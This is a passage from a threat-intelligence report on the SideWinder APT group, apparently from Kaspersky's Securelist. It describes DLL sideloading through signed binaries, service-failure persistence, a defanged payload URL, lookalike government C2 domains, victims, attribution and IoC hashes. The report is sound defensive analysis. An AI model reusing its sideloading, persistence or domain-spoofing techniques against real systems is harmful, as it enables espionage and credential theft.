minimize scroll-mouseover" style=" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;"> <div class="crayon-toolbar" data-settings=" mouseover overlay hide delay" style="font-size: 12px !important;height: 18px !important; line-height: 18px !important;"><span class="crayon-title"></span> <div class="crayon-tools" style="font-size: 12px !important;height: 18px !important; line-height: 18px !important;"><div class="crayon-button crayon-nums-button" title="Toggle Line Numbers"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-plain-button" title="Toggle Plain Code"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-wrap-button" title="Toggle Line Wrap"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-expand-button" title="Expand Code"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-copy-button" title="Copy"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-popup-button" title="Open Code In New Window"><div class="crayon-button-icon"></div></div></div></div> <div class="crayon-info" style="min-height: 16.8px !important; line-height: 16.8px !important;"></div> <div class="crayon-plain-wrap"><textarea wrap="soft" class="crayon-plain print-no" data-settings="dblclick" readonly style="-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;"> C:\WINDOWS\srclinks\vm3dservice.exe</textarea></div> <div class="crayon-main" style=""> <table class="crayon-table"> <tr class="crayon-row"> <td class="crayon-nums " data-settings="show"> <div class="crayon-nums-content" style="font-size: 12px !important; line-height: 15px !important;"><div class="crayon-num" data-line="crayon-67446d0bc5e4f382077549-1">1</div></div> </td> <td class="crayon-code"><div class="crayon-pre" style="font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;"><div class="crayon-line" id="crayon-67446d0bc5e4f382077549-1"><span class="crayon-i">C</span><span class="crayon-sy">:</span><span class="crayon-sy">\</span><span class="crayon-i">WINDOWS</span><span class="crayon-sy">\</span><span class="crayon-i">srclinks</span><span class="crayon-sy">\</span><span class="crayon-i">vm3dservice</span><span class="crayon-sy">.</span><span class="crayon-i">exe</span></div></div></td> </tr> </table> </div> </div><p> The file is a legitimate program digitally signed by VMware and is used by the attacker to sideload the malicious <span id="crayon-67446d0bc5e51898596634" class="crayon-syntax crayon-syntax-inline crayon-theme-classic crayon-theme-classic-inline crayon-font-monaco" style="font-size: 12px !important; line-height: 15px !important;font-size: 12px !important;"><span class="crayon-pre crayon-code" style="font-size: 12px !important; line-height: 15px !important;font-size: 12px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;"><span class="crayon-s">"winmm.dll"</span></span></span> library.</p> <p>This is a library developed in C++ and named <span id="crayon-67446d0bc5e53357140795" class="crayon-syntax crayon-syntax-inline crayon-theme-classic crayon-theme-classic-inline crayon-font-monaco" style="font-size: 12px !important; line-height: 15px !important;font-size: 12px !important;"><span class="crayon-pre crayon-code" style="font-size: 12px !important; line-height: 15px !important;font-size: 12px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;"><span class="crayon-s">"SyncBotServiceHijack.dll"</span></span></span> that exports all the functions normally exported by the legitimate “winmm.dll” library located in the system32 directory.</p> <p>All the functions point to a function that sleeps for 10 seconds and then raises a signal error and terminates execution.</p> <div id="attachment_114143" style="width: 337px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/10/07154911/SideWinder_2024_17.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-114143" class="size-full wp-image-114143" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/10/07154911/SideWinder_2024_17.png" alt="Instructions used to raise an error" width="327" height="71" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/10/07154911/SideWinder_2024_17.png 327w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/10/07154911/SideWinder_2024_17-300x65.png 300w" sizes="(max-width: 327px) 100vw, 327px" /></a><p id="caption-attachment-114143" class="wp-caption-text">Instructions used to raise an error</p></div> <p>This is part of the persistence mechanism created by the attacker. The malicious Windows service created by the InstallerPayload component is configured to launch another program if the service fails.</p> <div id="attachment_114144" style="width: 422px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/10/07154946/SideWinder_2024_18.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-114144" class="size-full wp-image-114144" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/10/07154946/SideWinder_2024_18.png" alt="Windows service properties" width="412" height="475" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/10/07154946/SideWinder_2024_18.png 412w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/10/07154946/SideWinder_2024_18-260x300.png 260w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/10/07154946/SideWinder_2024_18-304x350.png 304w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/10/07154946/SideWinder_2024_18-243x280.png 243w" sizes="(max-width: 412px) 100vw, 412px" /></a><p id="caption-attachment-114144" class="wp-caption-text">Windows service properties</p></div> <p>We may presume that the attacker uses this trick to bypass detection and sandbox technologies.</p> <p>In this case, the service starts another program previously dropped by the malware:</p> <div id="crayon-67446d0bc5e55171623198" class="crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate" data-settings=" minimize scroll-mouseover" style=" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;"> <div class="crayon-toolbar" data-settings=" mouseover overlay hide delay" style="font-size: 12px !important;height: 18px !important; line-height: 18px !important;"><span class="crayon-title"></span> <div class="crayon-tools" style="font-size: 12px !important;height: 18px !important; line-height: 18px !important;"><div class="crayon-button crayon-nums-button" title="Toggle Line Numbers"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-plain-button" title="Toggle Plain Code"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-wrap-button" title="Toggle Line Wrap"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-expand-button" title="Expand Code"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-copy-button" title="Copy"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-popup-button" title="Open Code In New Window"><div class="crayon-button-icon"></div></div></div></div> <div class="crayon-info" style="min-height: 16.8px !important; line-height: 16.8px !important;"></div> <div class="crayon-plain-wrap"><textarea wrap="soft" class="crayon-plain print-no" data-settings="dblclick" readonly style="-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;"> %systemroot%\srclinks\fsquirt.exe</textarea></div> <div class="crayon-main" style=""> <table class="crayon-table"> <tr class="crayon-row"> <td class="crayon-nums " data-settings="show"> <div class="crayon-nums-content" style="font-size: 12px !important; line-height: 15px !important;"><div class="crayon-num" data-line="crayon-67446d0bc5e55171623198-1">1</div></div> </td> <td class="crayon-code"><div class="crayon-pre" style="font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;"><div class="crayon-line" id="crayon-67446d0bc5e55171623198-1"><span class="crayon-sy">%</span><span class="crayon-i">systemroot</span><span class="crayon-sy">%</span><span class="crayon-sy">\</span><span class="crayon-i">srclinks</span><span class="crayon-sy">\</span><span class="crayon-i">fsquirt</span><span class="crayon-sy">.</span><span class="crayon-i">exe</span></div></div></td> </tr> </table> </div> </div><p> This is a legitimate Windows utility that provides the default GUI used by the Bluetooth File Transfer Wizard. This utility is used by the attacker to sideload another malicious library, <span id="crayon-67446d0bc5e57452802632" class="crayon-syntax crayon-syntax-inline crayon-theme-classic crayon-theme-classic-inline crayon-font-monaco" style="font-size: 12px !important; line-height: 15px !important;font-size: 12px !important;"><span class="crayon-pre crayon-code" style="font-size: 12px !important; line-height: 15px !important;font-size: 12px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;"><span class="crayon-s">"devobj.dll"</span></span></span>, which is a variant of the Backdoor loader module.</p> <h5 id="installerpayload_net">InstallerPayload_NET</h5> <p>This is another .NET library, which performs similar actions to the previously described InstallerPayload developed in C++. The main difference is that this malware embeds most of the files as resources.</p> <table width="100%"> <tbody> <tr> <td width="25%"><strong>Library</strong></td> <td width="40%"><strong>Hash</strong></td> <td width="35%"><strong>Description</strong></td> </tr> <tr> <td>devobjLoadAppDllx32</td> <td>a7aad43a572f44f8c008b9885cf936cf</td> <td>“Backdoor loader module” dropped as devobj.dll</td> </tr> <tr> <td>fsquirt</td> <td>ba54013cad72cd79d2b7843602835ed3</td> <td>Legitimate program signed by Microsoft</td> </tr> <tr> <td>Manage</td> <td>f840c721e533c05d152d2bc7bf1bc165</td> <td>Program to hijack Windows service</td> </tr> <tr> <td>manifest</td> <td>d3136d7151f60ec41a370f4743c2983b</td> <td>XML manifest</td> </tr> <tr> <td>propsysLoadAppDllx32</td> <td>56e7d6b5c61306096a5ba22ebbfb454e</td> <td>“Backdoor loader module” dropped as propsys.dll</td> </tr> </tbody> </table> <p>Similar to <span id="crayon-67446d0bc5e5a768007373" class="crayon-syntax crayon-syntax-inline crayon-theme-classic crayon-theme-classic-inline crayon-font-monaco" style="font-size: 12px !important; line-height: 15px !important;font-size: 12px !important;"><span class="crayon-pre crayon-code" style="font-size: 12px !important; line-height: 15px !important;font-size: 12px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;"><span class="crayon-i">InstallerPayload</span></span></span>, the malware creates a new service that launches <span id="crayon-67446d0bc5e5b922602825" class="crayon-syntax crayon-syntax-inline crayon-theme-classic crayon-theme-classic-inline crayon-font-monaco" style="font-size: 12px !important; line-height: 15px !important;font-size: 12px !important;"><span class="crayon-pre crayon-code" style="font-size: 12px !important; line-height: 15px !important;font-size: 12px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;"><span class="crayon-i">Manage</span><span class="crayon-sy">.</span><span class="crayon-i">exe</span></span></span>. Manage.exe is a simple program that sleeps for 20 seconds and then generates an exception.</p> <p>The service is configured to launch another program in case of failure. The second program, <span id="crayon-67446d0bc5e5d009481467" class="crayon-syntax crayon-syntax-inline crayon-theme-classic crayon-theme-classic-inline crayon-font-monaco" style="font-size: 12px !important; line-height: 15px !important;font-size: 12px !important;"><span class="crayon-pre crayon-code" style="font-size: 12px !important; line-height: 15px !important;font-size: 12px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;"><span class="crayon-s">"fsquirt.exe"</span></span></span> or <span id="crayon-67446d0bc5e5f772783168" class="crayon-syntax crayon-syntax-inline crayon-theme-classic crayon-theme-classic-inline crayon-font-monaco" style="font-size: 12px !important; line-height: 15px !important;font-size: 12px !important;"><span class="crayon-pre crayon-code" style="font-size: 12px !important; line-height: 15px !important;font-size: 12px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;"><span class="crayon-s">"write.exe"</span></span></span>, is a legitimate application that is used to sideload a malicious library, the Backdoor loader module component.</p> <p>The encrypted file to be loaded by the Backdoor loader module component is downloaded from a remote server using a URL embedded in the code:</p> <div id="crayon-67446d0bc5e61295448592" class="crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate" data-settings=" minimize scroll-mouseover" style=" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;"> <div class="crayon-toolbar" data-settings=" mouseover overlay hide delay" style="font-size: 12px !important;height: 18px !important; line-height: 18px !important;"><span class="crayon-title"></span> <div class="crayon-tools" style="font-size: 12px !important;height: 18px !important; line-height: 18px !important;"><div class="crayon-button crayon-nums-button" title="Toggle Line Numbers"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-plain-button" title="Toggle Plain Code"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-wrap-button" title="Toggle Line Wrap"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-expand-button" title="Expand Code"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-copy-button" title="Copy"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-popup-button" title="Open Code In New Window"><div class="crayon-button-icon"></div></div></div></div> <div class="crayon-info" style="min-height: 16.8px !important; line-height: 16.8px !important;"></div> <div class="crayon-plain-wrap"><textarea wrap="soft" class="crayon-plain print-no" data-settings="dblclick" readonly style="-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;"> hxxps://split.tyoin[.]biz/7n6at/g3mnr/1691394613799/f0f9e572</textarea></div> <div class="crayon-main" style=""> <table class="crayon-table"> <tr class="crayon-row"> <td class="crayon-nums " data-settings="show"> <div class="crayon-nums-content" style="font-size: 12px !important; line-height: 15px !important;"><div class="crayon-num" data-line="crayon-67446d0bc5e61295448592-1">1</div></div> </td> <td class="crayon-code"><div class="crayon-pre" style="font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;"><div class="crayon-line" id="crayon-67446d0bc5e61295448592-1"><span class="crayon-i">hxxps</span><span class="crayon-sy">:</span><span class="crayon-c">//split.tyoin[.]biz/7n6at/g3mnr/1691394613799/f0f9e572</span></div></div></td> </tr> </table> </div> </div><p> The received data are stored in a file with a random name and no extension.</p> <h5 id="infrastructure">Infrastructure</h5> <p>The attacker registered numerous domains using Hostinger, Namecheap, and Hosting Concepts as providers. They typically configure the malware to communicate with FQDN using specific subdomains with names that appear legitimate and are probably selected for relevance to the target. For example, the following is a small subset of subdomains used by the attacker.</p> <ul> <li>nextgen[.]paknavy-govpk[.]net</li> <li>premier[.]moittpk[.]org</li> <li>cabinet-division-pk[.]fia-gov[.]com</li> <li>navy-lk[.]direct888[.]net</li> <li>srilanka-navy[.]lforvk[.]com</li> <li>portdjibouti[.]pmd-office[.]org</li> <li>portdedjibouti[.]shipping-policy[.]info</li> <li>mofa-gov-sa[.]direct888[.]net</li> <li>mod-gov-bd[.]direct888[.]net</li> <li>mmcert-org-mm[.]donwloaded[.]com</li> <li>opmcm-gov-np[.]fia-gov[.]net</li> </ul> <p>Each domain and its related subdomains are resolved with a dedicated IP address. The C2s are hosted on a VPS used exclusively by the attacker, but rented from different providers for a very short time. The attacker uses different service providers, but has a preference for HZ Hosting, BlueVPS, and GhostNET.</p> <h4 id="victims">Victims</h4> <p>SideWinder targeted entities in various countries: Bangladesh, Djibouti, Jordan, Malaysia, the Maldives, Myanmar, Nepal, Pakistan, Saudi Arabia, Sri Lanka, Turkey and the United Arab Emirates.</p> <p>Targeted sectors include government and military entities, logistics, infrastructure and telecommunications companies, financial institutions, universities and oil trading companies. The attacker also targeted diplomatic entities in the following countries: Afghanistan, France, China, India, Indonesia and Morocco.</p> <h4 id="attribution">Attribution</h4> <p>We attribute these activities to the SideWinder APT group with medium/high confidence. The infection chain observed in these attacks is consistent with those observed in the past. Specifically, the following techniques are similar to previous SideWinder activity:</p> <ul> <li>The use of remote template injection, which is abused to download RTF files named “file.rtf” and forged to exploit CVE-2017-11882.</li> <li>The naming scheme used for the malicious subdomains, which attempts to resemble legitimate domains that are of significance to the targets.</li> <li>The .NET Downloader component and the Backdoor loader module are similar to those described in the past.</li> <li>Last but not least, most of the entities targeted by the group are similar to those targeted by SideWinder in the past.</li> </ul> <p><em>***More information, IoCs and YARA rules for SideWinder are available to customers of the Kaspersky Intelligence Reporting Service. Contact: <a href="mailto:intelreports@kaspersky.com" target="_blank" rel="noopener">intelreports@kaspersky.com</a>.</em></p> <h2 id="iocs">IOCs</h2> <h3 id="malicious-documents">Malicious documents</h3> <p><a href="https://opentip.kaspersky.com/6cf6d55a3968e2176db2bba2134bbe94/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______1d7a67e228f13e8e&utm_source=SL&utm_medium=SL&utm_campaign=SL" target="_blank" rel="noopener">6cf6d55a3968e2176db2bba2134bbe94</a><br /> <a href="https://opentip.kaspersky.com/c87eb71ff038df7b517644fa5c097eac/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______377208e93645979f&utm_source=SL&utm_medium=SL&utm_campaign=SL" target="_blank" rel="noopener">c87eb71ff038df7b517644fa5c097eac</a><br /> <a href="https://opentip.kaspersky.com/8202209354ece5c53648c52bdbd064f0/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______e5c4b35170f108b7&utm_source=SL&utm_medium=SL&utm_campaign=SL" target="_blank" rel="noopener">8202209354ece5c53648c52bdbd064f0</a><br /> <a href="https://opentip.kaspersky.com/5cc784afb69c153ab325266e8a7afaf4/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______bf5b4fbe61b90fa1&utm_source=SL&utm_medium=SL&utm_campaign=SL" target="_blank" rel="noopener">5cc784afb69c153ab325266e8a7afaf4</a><br /> <a href="https://opentip.kaspersky.com/3a6916192106ae3ac7e55bd357bc5eee/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______ba26908258f33e50&utm_source=SL&utm_medium=SL&utm_campaign=SL" target="_blank" rel="noopener">3a6916192106ae3ac7e55bd357bc5eee</a><br /> <a href="https://opentip.kaspersky.com/54aadadcf77dec53b2566fe61b034384/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______baa3825053071330&utm_source=SL&utm_medium=SL&utm_campaign=SL" target="_blank" rel="noopener">54aadadcf77dec53b2566fe61b034384</a><br /> <a href="https://opentip.kaspersky.com/8f83d19c2efc062e8983bce83062c9b6/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______2a0f7ca37c3c1eb6&utm_source=SL&utm_medium=SL&utm_campaign=SL" target="_blank" rel="noopener">8f83d19c2efc062e8983bce83062c9b6</a><br /> <a href="https://opentip.kaspersky.com/8e8b61e5fb6f6792f2bee0ec947f1989/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______116283d8ffd49271&utm_source=SL&utm_medium=SL&utm_campaign=SL" target="_blank" rel="noopener">8e8b61e5fb6f6792f2bee0ec947f1989</a><br /> <a href="https://opentip.kaspersky.com/86eeb037f5669bff655de1e08199a554/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______3743a24f34170eb1&utm_source=SL&utm_medium=SL&utm_campaign=SL" target="_blank" rel="noopener">86eeb037f5669bff655de1e08199a554</a><br /> <a href="https://opentip.kaspersky.com/1c36177ac4423129e301c5a40247f180/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______19d6628dce168526&utm_source=SL&utm_medium=SL&utm_campaign=SL" target="_blank" rel="noopener">1c36177ac4423129e301c5a40247f180</a><br /> <a href="https://opentip.kaspersky.com/873079cd3e635adb609c38af71bad702/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______44840314c68f6a69&utm_source=SL&utm_medium=SL&utm_campaign=SL" target="_blank" rel="noopener">873079cd3e635adb609c38af71bad702</a><br /> <a href="https://opentip.kaspersky.com/423e150d91edc568546f0d2f064a8bf1/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______8f1eda5668a93cfb&utm_source=SL&utm_medium=SL&utm_campaign=SL" target="_blank" rel="noopener">423e150d91edc568546f0d2f064a8bf1</a><br /> <a href="https://opentip.kaspersky.com/4a5e818178f9b2dc48839a5dbe0e3cc1/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______04d4fe74ef8fcfd0&utm_source=SL&utm_medium=SL&utm_campaign=SL" target="_blank" rel="noopener">4a5e818178f9b2dc48839a5dbe0e3cc1</a></p> <h3 id="rtf">Rtf</h3> <p><a href="https://opentip.kaspersky.com/26aa30505d8358ebeb5ee15aecb1cbb0/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______ef8379cb635e06c0&utm_source=SL&utm_medium=SL&utm_campaign=SL" target="_blank" rel="noopener">26aa30505d8358ebeb5ee15aecb1cbb0</a><br /> <a href="https://opentip.kaspersky.com/3233db78e37302b47436b550a21cdaf9/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______0257e263094f9785&utm_source=SL&utm_medium=SL&utm_campaign=SL" target="_blank" rel="noopener">3233db78e37302b47436b550a21cdaf9</a><br /> <a href="https://opentip.kaspersky.com/8d7c43913eba26f96cd656966c1e26d5/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______df34dd0e78633888&utm_source=SL&utm_medium=SL&utm_campaign=SL" target="_blank" rel="noopener">8d7c43913eba26f96cd656966c1e26d5</a><br /> <a href="https://opentip.kaspersky.com/d0d1fba6bb7be933889ace0d6955a1d7/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______f63ab8f1cf90229a&utm_source=SL&utm_medium=SL&utm_campaign=SL" target="_blank" rel="noopener">d0d1fba6bb7be933889ace0d6955a1d7</a><br /> <a href="https://opentip.kaspersky.com/e706fc65f433e54538a3dbb1c359d75f/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______43510735b44626f2&utm_source=SL&utm_medium=SL&utm_campaign=SL" target="_blank" rel="noopener">e706fc65f433e54538a3dbb1c359d75f</a></p> <h3 id="lnk">Lnk</h3> <p><a href="https://opentip.kaspersky.com/412b6ac53aeadb08449e41dccffb1abe/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______6f49fffd2516b663&utm_source=SL&utm_medium=SL&utm_campaign=SL" target="_blank" rel="noopener">412b6ac53aeadb08449e41dccffb1abe</a> දින සංශෝධන කර ගැනිම .lnk<br /> <a href="https://opentip.kaspersky.com/2f4ba98dcd45e59fca488f436ab13501/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______e890838c62d24b50&utm_source=SL&utm_medium=SL&utm_campaign=SL" target="_blank" rel="noopener">2f4ba98dcd45e59fca488f436ab13501</a> Special Envoy Speech at NCA.jpg .lnk</p> <h3 id="backdoor-loader">Backdoor Loader</h3> <p><strong><em>propsys.dll</em></strong><br /> <a href="https://opentip.kaspersky.com/b69867ee5b9581687cef96e873b775ff/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______75cfc15cca529479&utm_source=SL&utm_medium=SL&utm_campaign=SL" target="_blank" rel="noopener">b69867ee5b9581687cef96e873b775ff</a><br /> <a href="https://opentip.kaspersky.com/c3ce4094b3411060928143f63701aa2e/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______31ff64595bb7d597&utm_source=SL&utm_medium=SL&utm_campaign=SL" target="_blank" rel="noopener">c3ce4094b3411060928143f63701aa2e</a><br /> <a href="https://opentip.kaspersky.com/e1bdfa55227d37a71cdc248dc9512296/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______b68d7f50b8c11b86&utm_source=SL&utm_medium=SL&utm_campaign=SL" target="_blank" rel="noopener">e1bdfa55227d37a71cdc248dc9512296</a><br /> <a href="https://opentip.kaspersky.com/ea4b3f023bac3ad1a982cace9a6eafc3/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______5f1d6857f0c66f66&utm_source=SL&utm_medium=SL&utm_campaign=SL" target="_blank" rel="noopener">ea4b3f023bac3ad1a982cace9a6eafc3</a><br /> <a href="https://opentip.kaspersky.com/44dbdd87b60c20b22d2a7926ad2d7bea/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______1abefcd36295e188&utm_source=SL&utm_medium=SL&utm_campaign=SL" target="_blank" rel="noopener">44dbdd87b60c20b22d2a7926ad2d7bea</a><br /> <a href="https://opentip.kaspersky.com/7e97cbf25eef7fc79828c033049822af/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______424199986086e9b5&utm_source=SL&utm_medium=SL&utm_campaign=SL" target="_blank" rel="noopener">7e97cbf25eef7fc79828c033049822af</a><br /> <strong><em>vsstrace.dll</em></strong><br /> <a href="https://opentip.kaspersky.com/101a63ecdd8c68434c665bf2b1d3ffc7/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______fb813317a5253fb0&utm_source=SL&utm_medium=SL&utm_campaign=SL" target="_blank" rel="noopener">101a63ecdd8c68434c665bf2b1d3ffc7</a><br /> <a href="https://opentip.kaspersky.com/d885df399fc9f6c80e2df0c290414c2f/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______3b9a5dae0bd7646c&utm_source=SL&utm_medium=SL&utm_campaign=SL" target="_blank" rel="noopener">d885df399fc9f6c80e2df0c290414c2f</a><br /> <a href="https://opentip.kaspersky.com/92dd91a5e3dfb6260e13c8033b729e03/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______8bbe4b8351fd8854&utm_source=SL&utm_medium=SL&utm_campaign=SL" target="_blank" rel="noopener">92dd91a5e3dfb6260e13c8033b729e03</a><br /> <a href="https://opentip.kaspersky.com/515d2d6f91ba4b76847301855dfc0e83/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______7e83834c8b2c1714&utm_source=SL&utm_medium=SL&utm_campaign=SL" target="_blank" rel="noopener">515d2d6f91ba4b76847301855dfc0e83</a><br /> <a href="https://opentip.kaspersky.com/3ede84d84c02aa7483eb734776a20dea/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______ecb56291ba27d85c&utm_source=SL&utm_medium=SL&utm_campaign=SL" target="_blank" rel="noopener">3ede84d84c02aa7483eb734776a20dea</a><br /> <a href="https://opentip.kaspersky.com/2011658436a7b04935c06f59a5db7161/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______04a81c27b58a0a51&utm_source=SL&utm_medium=SL&utm_campaign=SL" target="_blank" rel="noopener">2011658436a7b04935c06f59a5db7161</a></p> <h3 id="stealerbot">StealerBot</h3> <p><a href="https://opentip.kaspersky.com/3a036a1846bfeceb615101b10c7c910e/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______d8b1412582bcfdac&utm_source=SL&utm_medium=SL&utm_campaign=SL" target="_blank" rel="noopener">3a036a1846bfeceb615101b10c7c910e</a> Orchestrator<br /> <a href="https://opentip.kaspersky.com/47f51c7f31ab4a0d91a0f4c07b2f99d7/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______ef1773cb2fce71cd&utm_source=SL&utm_medium=SL&utm_campaign=SL" target="_blank" rel="noopener">47f51c7f31ab4a0d91a0f4c07b2f99d7</a> Keylogger<br /> <a href="https://opentip.kaspersky.com/f3058ac120a2ae7807f36899e27784ea/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______78c3c19db4d047b1&utm_source=SL&utm_medium=SL&utm_campaign=SL" target="_blank" rel="noopener">f3058ac120a2ae7807f36899e27784ea</a> Screenshot grabber<br /> <a href="https://opentip.kaspersky.com/0fbb71525d65f0196a9bfbffea285b18/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______f02e466ecd567933&utm_source=SL&utm_medium=SL&utm_campaign=SL" target="_blank" rel="noopener">0fbb71525d65f0196a9bfbffea285b18</a> File stealer<br /> <a href="https://opentip.kaspersky.com/1ed7ad166567c46f71dc703e55d31c7a/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______32db391a520fe0fc&utm_source=SL&utm_medium=SL&utm_campaign=SL" target="_blank" rel="noopener">1ed7ad166567c46f71dc703e55d31c7a</a> Live Console<br /> <a href="https://opentip.kaspersky.com/2f0e150e3d6dbb1624c727d1a641e754/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______ec31e2f509744a27&utm_source=SL&utm_medium=SL&utm_campaign=SL" target="_blank" rel="noopener">2f0e150e3d6dbb1624c727d1a641e754</a> RDP Credential Stealer<br /> <a href="https://opentip.kaspersky.com/bf16760ee49742225fdb2a73c1bd83c7/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______b17793f1dca0b4c7&utm_source=SL&utm_medium=SL&utm_campaign=SL" target="_blank" rel="noopener">bf16760ee49742225fdb2a73c1bd83c7</a> RDP Credential Stealer – Injected library<br /> mscorlib.dll<br /> <a href="https://opentip.kaspersky.com/b3650a88a50108873fc45ad3c249671a/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______6bab8a98a0dc967f&utm_source=SL&utm_medium=SL&utm_campaign=SL" target="_blank" rel="noopener">b3650a88a50108873fc45ad3c249671a</a> Token Grabber<br /> <a href="https://opentip.kaspersky.com/4c40fcb2a12f171533fc070464db96d1/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______ae1c7cb78a6619f9&utm_source=SL&utm_medium=SL&utm_campaign=SL" target="_blank" rel="noopener">4c40fcb2a12f171533fc070464db96d1</a> Credential Phisher – Injected library<br /> <a href="https://opentip.kaspersky.com/eef9c0a9e364b4516a83a92592ffc831/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______b63508af722da44f&utm_source=SL&utm_medium=SL&utm_campaign=SL" target="_blank" rel="noopener">eef9c0a9e364b4516a83a92592ffc831</a> UACBypass</p> 